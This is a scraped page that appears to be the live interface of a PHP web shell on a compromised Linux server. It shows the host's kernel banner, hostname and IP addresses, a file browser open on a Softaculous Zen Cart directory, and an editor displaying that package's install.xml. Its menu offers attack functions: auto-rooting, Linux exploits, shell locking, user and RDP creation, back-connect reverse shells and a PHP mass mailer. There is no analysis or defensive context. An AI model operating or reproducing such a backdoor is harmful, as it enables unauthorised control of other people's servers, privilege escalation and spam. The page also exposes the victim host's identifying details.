Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
zencart /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
NOTES.txt
1.64
KB
-rw-r--r--
clone.php
9.34
KB
-rw-r--r--
configure.php
3.52
KB
-rw-r--r--
configure_.php
2.74
KB
-rw-r--r--
edit.php
6
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
10.8
KB
-rw-r--r--
fileindex.php
345
B
-rw-r--r--
import.php
3.42
KB
-rw-r--r--
info.xml
3.26
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.44
KB
-rw-r--r--
install.xml
1.52
KB
-rw-r--r--
md5
2.41
KB
-rw-r--r--
update_pass.php
498
B
-rw-r--r--
upgrade.php
6.85
KB
-rw-r--r--
upgrade.xml
361
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install.xml
<softinstall xmlns="http://www.softaculous.com"> <settings> <group> <heading>{{store_set}}</heading> <input type="text" name="store_name" size="30" value="My Store"> <head>{{store_name}}</head> </input> <input type="text" name="store_owner" size="30" value="Owner"> <head>{{store_owner}}</head> </input> <input type="textarea"> <textarea name="store_address" cols="30" rows="5">Store Name Address Country Phone</textarea> <head>{{store_address}}</head> </input> </group> <group> <heading>{{db_set}}</heading> <input type="text" name="dbprefix" size="30" value="zen_"> <head>{{db_pre}}</head> <optional>true</optional> </input> </group> <group> <heading>{{ad_act}}</heading> <input type="text" name="admin_username" size="30" value="admin"> <head>{{ad_name}}</head> </input> <input type="text" name="admin_pass" size="30" value="pass1234"> <head>{{ad_pass}}</head> <handle>__ad_pass</handle> </input> <input type="text" name="admin_email" size="30" value="admin" softmail="true"> <head>{{ad_email}}</head> <handle>__email_address</handle> </input> </group> </settings> <db>mysql</db> <files> <exclude>zc_install/*</exclude> <exclude>zc_install/*/*</exclude> <exclude>zc_install/*/*/*</exclude> <exclude>zc_install/*/*/*/*</exclude> <exclude>zc_install/*/*/*/*/*</exclude> <exclude>zc_install/*/*/*/*/*/*</exclude> <exclude>zc_install/*/*/*/*/*/*/*</exclude> <exclude>zc_install/*/*/*/*/*/*/*/*</exclude> </files> </softinstall>
Close